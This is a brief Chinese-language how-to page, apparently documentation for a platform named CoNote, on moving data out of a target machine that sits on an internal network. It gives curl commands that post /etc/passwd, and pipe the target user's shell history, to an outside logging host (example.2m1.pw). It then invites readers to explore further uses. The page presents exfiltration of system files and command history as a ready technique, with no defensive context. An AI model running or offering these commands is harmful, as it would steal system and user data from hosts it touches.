数据与文件传输

有的时候目标在内网,或没有HTTP服务的时候,我们需要传递文件,可以借助CoNote平台。

举个例子,我们需要读取一个大文件,如/etc/passwd,我们可以将其放在POST Body中,发送给CoNote的Web记录:

curl "http://example.2m1.pw/" --data-binary @/etc/passwd

然后在HTTP记录详情中查看Body:

如果我们传输的文件是二进制格式(如zip、exe等),网页中显示的不全,我们可以点击右侧的下载按钮下载之:

再比如,我们要读取目标用户的bash记录,也可以通过如下命令传递信息:

history | curl "http://example.2m1.pw/" --data-binary @-

更多玩法可以自己探索。

results matching ""

    No results matching ""